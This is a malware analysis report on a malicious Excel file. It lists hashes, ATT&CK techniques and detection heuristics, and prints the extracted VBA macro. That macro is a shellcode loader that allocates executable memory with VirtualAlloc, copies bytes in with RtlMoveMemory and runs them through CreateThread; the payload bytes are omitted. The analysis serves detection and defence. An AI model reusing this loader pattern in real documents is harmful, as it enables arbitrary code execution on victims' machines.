Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 797f6559e483de12…

MALICIOUS

Office (OLE)

Size: 49.0 KB
Created: 2017-12-04 12:03:32
Authoring application: Microsoft Excel
First seen: 2017-12-09
MD5: 8bbd318290ea166e4289fe177fb89a68
SHA-1: 7d2f0b833cf478f76efad3005f5f277e4fae4caf
SHA-256: 797f6559e483de12fd7cb24423aa9d10400005895c9e7a40739ebcc57f90bff9
Risk score: 80

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1203 Exploitation for Client Execution
  • T1059 Command and Scripting Interpreter

The sample is an Excel file containing VBA macros with an Auto_Open execution token, indicating that it attempts to run code as soon as the document is opened. The references to the VirtualAlloc API and the high-severity heuristic for VBA p-code auto-execution with execution tokens strongly suggest that the macro is designed to allocate memory and execute shellcode. This shellcode is likely a downloader for a second-stage payload, but no specific URLs or further execution details were extracted.

Heuristics (3)

  • VBA macros detected (severity: medium; 1 related finding) OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA p-code auto-exec with execution tokens (severity: high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Reference to VirtualAlloc API (severity: medium) SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind       Source                                               Size
macros.bas  vba-macro  oletools.olevba.extract_macros (decoded VBA source)  5534 bytes
SHA-256: dfacf516e0e58dd52850b82e8c84f44d0139f731f58bf59f13067f53588039a0

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "CommandButton1, 1, 0, MSForms, CommandButton"
#If VBA7 Then
        Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Eqzzrhfx As Long, ByVal Qoari As Long, ByVal Vftma As LongPtr, Wkss As Long, ByVal Sqydcnj As Long, Zjynyit As Long) As LongPtr
        Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Zzgu As Long, ByVal Hapurdb As Long, ByVal Deej As Long, ByVal Ojxmvyzxk As Long) As LongPtr
        Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Raxcrvocu As LongPtr, ByRef Cjneft As Any, ByVal Sozfjen As Long) As LongPtr
#Else
        Private Declare Function CreateThread Lib "kernel32" (ByVal Eqzzrhfx As Long, ByVal Qoari As Long, ByVal Vftma As Long, Wkss As Long, ByVal Sqydcnj As Long, Zjynyit As Long) As Long
        Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Zzgu As Long, ByVal Hapurdb As Long, ByVal Deej As Long, ByVal Ojxmvyzxk As Long) As Long
        Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Raxcrvocu As Long, ByRef Cjneft As Any, ByVal Sozfjen As Long) As Long
#End If

Private Sub CommandButton1_Click()
Dim Fzdtqwu As Long, Xsyf As Variant, Zrh As Long
#If VBA7 Then
        Dim Dzdyfjwa As LongPtr, Iofpdfbf As LongPtr
#Else
        Dim Dzdyfjwa As Long, Iofpdfbf As Long
#End If
        Xsyf = Array(...)   ' raw shellcode byte array omitted from this preview

        Dzdyfjwa = VirtualAlloc(0, UBound(Xsyf), &H1000, &H40)
        For Zrh = LBound(Xsyf) To UBound(Xsyf)
                Fzdtqwu = Xsyf(Zrh)
                Iofpdfbf = RtlMoveMemory(Dzdyfjwa + Zrh, Fzdtqwu, 1)
        Next Zrh
        Iofpdfbf = CreateThread(0, 0, Dzdyfjwa, 0, 0, 0)
End Sub


Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True